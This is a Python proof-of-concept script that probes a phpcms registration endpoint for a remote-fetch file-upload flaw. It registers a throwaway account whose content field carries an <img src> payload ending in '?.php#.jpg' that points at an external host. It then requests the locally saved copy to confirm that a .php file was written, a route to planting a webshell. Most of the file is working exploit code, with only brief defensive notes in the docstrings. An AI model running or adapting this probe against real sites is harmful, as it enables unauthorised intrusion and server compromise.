#!/usr/bin/env python
#-*- coding: utf-8 -*-

import requests
import sys
import random
import re
import argparse
from json_parse import Jsonparse

# Browser-like request headers, kept in insertion order as (name, value) pairs.
# Declared at module level only: neither the POST nor the GET issued further down
# in this file passes ``headers=``, so these values are never sent.
headers = dict([
	("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0"),
	("Accept-Language", "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2"),
	("Content-Type", "application/x-www-form-urlencoded"),
	("Accept-Encoding", "gzip, deflate"),
	("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"),
])


class phpcms(object):
	"""Probe a phpcms member-registration endpoint for a remote-fetch file-upload weakness.

	One registration form is POSTed whose ``info[content]`` field carries an
	``<img src=...>`` tag pointing at an off-site URL. The HTML-escaped echo of
	that tag in the response is then inspected: if the echoed ``src`` now points
	at the target host itself, the server fetched the remote resource and stored
	a local copy, and a GET on that local URL decides the verdict.

	Defender's view: the probe is a plain POST to
	``index.php?m=member&c=index&a=register`` containing an ``info[content]``
	value with an off-site ``<img src=`` (note the ``?.php#.jpg`` suffix), followed
	by a GET for whatever URL the server echoed back. Both requests appear in
	ordinary web-server logs. The mitigation is to stop the registration path
	from fetching attacker-supplied URLs and saving them under a server-executable
	extension; the affected version range is not recorded in this file.

	Exit codes set by ``run``: 233 (local copy reachable), 1 (nothing local was
	echoed back), -1 (request error). See ``run`` for the one path that returns.
	"""

	def __init__(self,ip: str,port,level) -> None:
		# ip is concatenated into a URL and substring-tested later, so it must be text.
		self.ip = ip
		# port is str()-converted when the URL is built; callers may pass int or str.
		self.port = port
		# level is used only as the ``timeout`` argument of both requests calls.
		self.level = level

	def run(self) -> None:
		"""Send the registration probe, print findings, and exit the process.

		Side effects: one POST to the target, optionally one GET to the echoed
		URL, assignment of the module-level name ``req`` (see ``global`` below),
		and ``exit()`` on every path except one: an echoed URL that contains the
		target IP but does not answer 200 falls through and returns None.
		"""
		# ``global`` makes the response object a module attribute rather than a local;
		# nothing in this file reads it afterwards, so this is only a side effect.
		global req
		string=''
		# 10-character random permutation of the letters a..j; the replace() is a
		# no-op because sample() never yields a space.
		name = string.join(random.sample(['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j'], 10)).replace(" ", "")
		# Registration form. The username/password/email are throwaway values derived
		# from ``name`` so each run registers a distinct account on the target.
		data = {
			'siteid': '1',
			'modelid': '1',
			'username': name,
			'password': name+'1',
			'email': name+'@test.com',
			'info[content]': '<img src=http://gitee.com/dylk/tmpp/raw/master/ceshi.txt?.php#.jpg>',# original author's note: change this to a public-network IP and place a file there to verify the upload.
			'dosubmit': '1',
		}
		
		url = 'http://'+self.ip+':'+str(self.port)+'/index.php?m=member&c=index&a=register&siteid=1'
		try:
			req = requests.post(url=url, data=data, timeout = self.level)
		except Exception as e:
				# Any transport/HTTP error aborts the probe with -1 (builtin ``exit``,
				# not ``sys.exit``; the two differ only when the ``site`` module is absent).
				print(e)
				exit(-1)
				
		shell = ''
		# Look for the HTML-escaped echo of the submitted <img> tag and capture its src.
		# NOTE(review): str pattern against req.content — this assumes a text body
		# (Python 2 era requests; the coding cookie and bare exit() suggest that);
		# under Python 3 ``content`` is bytes, so confirm the intended interpreter.
		re_result = re.findall(r'&lt;img src=(.*)&gt', req.content)
		print(re_result)  # debug output: every captured src, not just the first
		if len(re_result):
			shell = re_result[0]
			print (shell)
		# Substring test: the echoed src is considered "local" if it contains the target IP.
		if self.ip in shell:
			r2 = requests.get(shell,timeout = self.level)
			if r2.status_code == 200:
				print("success")
				exit(233) 	
		else:
			# Covers both "nothing echoed" (shell == '') and an off-site echo.
			print("no vul in phpcms")
			exit(1)
if __name__ == '__main__':
	# Positional CLI: <base_dir> <target_ip> <port>. The request timeout is not a
	# CLI argument; it is read from ``timeout2`` in the JSON config under base_dir.
	# Evaluation order matches the original: config is parsed before the second
	# and third arguments are touched.
	config_path = sys.argv[1] + '\\poc\\lib\\config.json'
	config = Jsonparse(config_path).parse()
	target_ip = sys.argv[2]
	wait = config['timeout2']
	target_port = sys.argv[3]  # passed through as a string; phpcms str()s it anyway
	phpcms(target_ip, target_port, wait).run()